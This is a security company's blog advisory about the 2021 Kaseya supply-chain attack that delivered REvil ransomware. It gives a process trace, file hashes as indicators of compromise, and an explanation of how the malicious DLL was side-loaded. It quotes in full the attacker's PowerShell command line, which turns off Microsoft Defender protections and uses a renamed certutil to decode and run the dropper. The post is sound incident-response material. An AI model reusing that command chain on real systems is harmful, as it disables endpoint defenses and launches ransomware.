MegaplanIT Blog's & Informational Resources

Whether you’re looking to secure your business or stay PCI compliant, MegaplanIT has a certified team of experts that can help you every step of the way. Stay informed with up-to-date blog.

Urgent Notice: Kaseya Software Supply Chain Attack

Posted by MegaplanIT on 7/2/21 2:10 PM

By: Andrew Haslett LinkedIn_logo_initials

Security Engineer - Incident Response Specialist 


Happening Now

We are monitoring a Supply Chain attack outbreak utilizing REvil ransomware. At this time it appears to stem from a malicious Kaseya update. A malicious DLL containing the REvil Ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of Microsoft Defender (C:\Windows\MsMpEng.exe) to run the encryption from a legitimate-looking process.
Attack chain contains code that attempts to disable Microsoft Defender Real-Time Monitoring, Script Scanning, Controlled Folder Access, etc. via PowerShell.
Process Trace:
1. C:\windows\msmpeng.exe
2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe 
4. <powershell> ( Listed Below )
5. AgentMon.exe
6. C:\Windows\System32\services.exe


/c ping 127 0 0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1 0 \powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output <nil> % random% >> c:\windows\cert.exe & c:\windows\cert.exe () -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe


The following command is run, which:
• Disables Real-Time Monitoring
• Disables IPS
• Disables Cloud Lookup
• Disables script scanning
• Disabled Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection
• Stops cloud sample submission
Agent.crt is dropped by the Kaseya VSA. It is then decoded with certutil to carve out agent.exe. Inside agent.exe it has 2 files embedded, MsMpEng.exe and mpsvc.dll. The legitimate Windows Defender executable was used to side-load the REvil Ransomware



agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c  
We will update as more information become available. To Read More About This Attack: 

Speak With A MegaplanIT Expert 

We look forward to talking to you about any active threat vulnerabilities that are currently taking place. Reach out to us today and set up a meeting with a MegplanIT Cerfited expert, we are always here and ready to help 24/7/365

Schedule Meeting

Topics: Managed Security Services

Leave Comment